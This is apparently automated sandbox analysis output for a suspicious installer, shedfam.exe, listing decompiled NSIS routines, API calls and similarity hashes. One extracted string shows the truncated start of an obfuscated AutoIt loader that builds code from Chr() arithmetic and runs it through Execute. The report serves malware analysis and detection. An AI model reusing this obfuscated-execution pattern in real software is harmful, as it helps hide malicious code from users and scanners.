                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x00406a1b
                                                                  0x004069a2
                                                                  0x0040699f

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                                  • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                                                                  • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                                  • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E00401E1B() {
                                                                  				void* _t15;
                                                                  				void* _t24;
                                                                  				void* _t26;
                                                                  				void* _t31;
                                                                  
                                                                  				_t28 = E00402A0C(_t24);
                                                                  				E00404FE7(0xffffffeb, _t13);
                                                                  				_t15 = E0040555B(_t28); // executed
                                                                  				 *(_t31 + 8) = _t15;
                                                                  				if(_t15 == _t24) {
                                                                  					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                  				} else {
                                                                  					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
                                                                  						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                  							E004060C3(0xf);
                                                                  						}
                                                                  						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
                                                                  						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
                                                                  							if( *(_t31 - 0xc) != _t24) {
                                                                  								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                  							}
                                                                  						} else {
                                                                  							E00405C59(_t26,  *(_t31 - 0xc));
                                                                  						}
                                                                  					}
                                                                  					_push( *(_t31 + 8));
                                                                  					CloseHandle();
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
                                                                  				return 0;
                                                                  			}







                                                                  0x00401e21
                                                                  0x00401e26
                                                                  0x00401e2c
                                                                  0x00401e33
                                                                  0x00401e36
                                                                  0x00402672
                                                                  0x00401e3c
                                                                  0x00401e3f
                                                                  0x00401e50
                                                                  0x00401e4b
                                                                  0x00401e4b
                                                                  0x00401e65
                                                                  0x00401e6e
                                                                  0x00401e7e
                                                                  0x00401e80
                                                                  0x00401e80
                                                                  0x00401e70
                                                                  0x00401e74
                                                                  0x00401e74
                                                                  0x00401e6e
                                                                  0x00401e87
                                                                  0x00401e8a
                                                                  0x00401e8a
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 00405095
                                                                    • Part of subcall function 00404FE7: SendMessageA.USER32 ref: 004050A3
                                                                    • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                                    • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                                  • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3521207402-0
                                                                  • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                                  • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                                                                  • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                                  • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040365C() {
                                                                  				void* _t1;
                                                                  				void* _t2;
                                                                  				void* _t4;
                                                                  				void* _t7;
                                                                  				signed int _t12;
                                                                  
                                                                  				_t1 =  *0x409014; // 0xffffffff
                                                                  				if(_t1 != 0xffffffff) {
                                                                  					CloseHandle(_t1);
                                                                  					 *0x409014 =  *0x409014 | 0xffffffff;
                                                                  				}
                                                                  				_t2 =  *0x409018; // 0xffffffff
                                                                  				if(_t2 != 0xffffffff) {
                                                                  					CloseHandle(_t2);
                                                                  					 *0x409018 =  *0x409018 | 0xffffffff;
                                                                  					_t12 =  *0x409018;
                                                                  				}
                                                                  				E004036B9();
                                                                  				_t4 = E00405620(_t7, _t12, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nse13EA.tmp\\", 7); // executed
                                                                  				return _t4;
                                                                  			}








                                                                  0x0040365c
                                                                  0x0040366b
                                                                  0x0040366e
                                                                  0x00403670
                                                                  0x00403670
                                                                  0x00403677
                                                                  0x0040367f
                                                                  0x00403682
                                                                  0x00403684
                                                                  0x00403684
                                                                  0x00403684
                                                                  0x0040368b
                                                                  0x00403697
                                                                  0x0040369d

                                                                  APIs
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nse13EA.tmp\, xrefs: 00403692
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse13EA.tmp\
                                                                  • API String ID: 2962429428-758263695
                                                                  • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                                  • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                                                                  • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                                  • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004031D5(void* _a4, long _a8) {
                                                                  				int _t6;
                                                                  				long _t10;
                                                                  
                                                                  				_t10 = _a8;
                                                                  				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                  				if(_t6 == 0 || _a8 != _t10) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					return 1;
                                                                  				}
                                                                  			}





                                                                  0x004031d9
                                                                  0x004031ec
                                                                  0x004031f4
                                                                  0x00000000
                                                                  0x004031fb
                                                                  0x00000000
                                                                  0x004031fd

                                                                  APIs
                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,0040B120,004030DA,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                                                                  Strings
                                                                  • Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 004031D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
                                                                  • API String ID: 2738559852-3096212848
                                                                  • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                  • Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
                                                                  • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                  • Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 69%
                                                                  			E00401389(signed int _a4) {
                                                                  				intOrPtr* _t6;
                                                                  				void* _t8;
                                                                  				void* _t10;
                                                                  				signed int _t11;
                                                                  				void* _t12;
                                                                  				signed int _t16;
                                                                  				signed int _t17;
                                                                  				void* _t18;
                                                                  
                                                                  				_t17 = _a4;
                                                                  				while(_t17 >= 0) {
                                                                  					_t6 = _t17 * 0x1c +  *0x423fb0;
                                                                  					if( *_t6 == 1) {
                                                                  						break;
                                                                  					}
                                                                  					_push(_t6); // executed
                                                                  					_t8 = E00401434(); // executed
                                                                  					if(_t8 == 0x7fffffff) {
                                                                  						return 0x7fffffff;
                                                                  					}
                                                                  					_t10 = E0040136D(_t8);
                                                                  					if(_t10 != 0) {
                                                                  						_t11 = _t10 - 1;
                                                                  						_t16 = _t17;
                                                                  						_t17 = _t11;
                                                                  						_t12 = _t11 - _t16;
                                                                  					} else {
                                                                  						_t12 = _t10 + 1;
                                                                  						_t17 = _t17 + 1;
                                                                  					}
                                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                  						 *0x42376c =  *0x42376c + _t12;
                                                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
                                                                  					}
                                                                  				}
                                                                  				return 0;
                                                                  			}











                                                                  0x0040138a
                                                                  0x004013fa
                                                                  0x0040139b
                                                                  0x004013a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004013a2
                                                                  0x004013a3
                                                                  0x004013ad
                                                                  0x00000000
                                                                  0x00401404
                                                                  0x004013b0
                                                                  0x004013b7
                                                                  0x004013bd
                                                                  0x004013be
                                                                  0x004013c0
                                                                  0x004013c2
                                                                  0x004013b9
                                                                  0x004013b9
                                                                  0x004013ba
                                                                  0x004013ba
                                                                  0x004013c9
                                                                  0x004013cb
                                                                  0x004013f4
                                                                  0x004013f4
                                                                  0x004013c9
                                                                  0x00000000

                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32 ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                                  • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                                                                  • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                                  • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00406087(signed int _a4) {
                                                                  				struct HINSTANCE__* _t5;
                                                                  				signed int _t10;
                                                                  
                                                                  				_t10 = _a4 << 3;
                                                                  				_t8 =  *(_t10 + 0x409248);
                                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
                                                                  				if(_t5 != 0) {
                                                                  					L2:
                                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
                                                                  				}
                                                                  				_t5 = E0040601D(_t8); // executed
                                                                  				if(_t5 == 0) {
                                                                  					return 0;
                                                                  				}
                                                                  				goto L2;
                                                                  			}





                                                                  0x0040608f
                                                                  0x00406092
                                                                  0x00406099
                                                                  0x004060a1
                                                                  0x004060ad
                                                                  0x00000000
                                                                  0x004060b4
                                                                  0x004060a4
                                                                  0x004060ab
                                                                  0x00000000
                                                                  0x004060bc
                                                                  0x00000000

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                    • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                                                                    • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                                                                    • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                                  • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
                                                                  • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                                  • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E004059D2(CHAR* _a4, long _a8, long _a12) {
                                                                  				signed int _t5;
                                                                  				void* _t6;
                                                                  
                                                                  				_t5 = GetFileAttributesA(_a4); // executed
                                                                  				asm("sbb ecx, ecx");
                                                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                  				return _t6;
                                                                  			}





                                                                  0x004059d6
                                                                  0x004059e3
                                                                  0x004059f8
                                                                  0x004059fe

                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 004059D6
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405526(CHAR* _a4) {
                                                                  				int _t2;
                                                                  
                                                                  				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                  				if(_t2 == 0) {
                                                                  					return GetLastError();
                                                                  				}
                                                                  				return 0;
                                                                  			}




                                                                  0x0040552c
                                                                  0x00405534
                                                                  0x00000000
                                                                  0x0040553a
                                                                  0x00000000

                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                                                                  • GetLastError.KERNEL32 ref: 0040553A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                  • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                                                                  • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                  • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004059B3(CHAR* _a4) {
                                                                  				signed char _t3;
                                                                  				int _t5;
                                                                  
                                                                  				_t3 = GetFileAttributesA(_a4); // executed
                                                                  				if(_t3 != 0xffffffff) {
                                                                  					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                                                                  					return _t5;
                                                                  				}
                                                                  				return _t3;
                                                                  			}





                                                                  0x004059b7
                                                                  0x004059c0
                                                                  0x004059c9
                                                                  0x00000000
                                                                  0x004059c9
                                                                  0x004059cf

                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                                  • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                                                                  • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                                  • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00403207(long _a4) {
                                                                  				long _t2;
                                                                  
                                                                  				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                  				return _t2;
                                                                  			}




                                                                  0x00403215
                                                                  0x0040321b

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
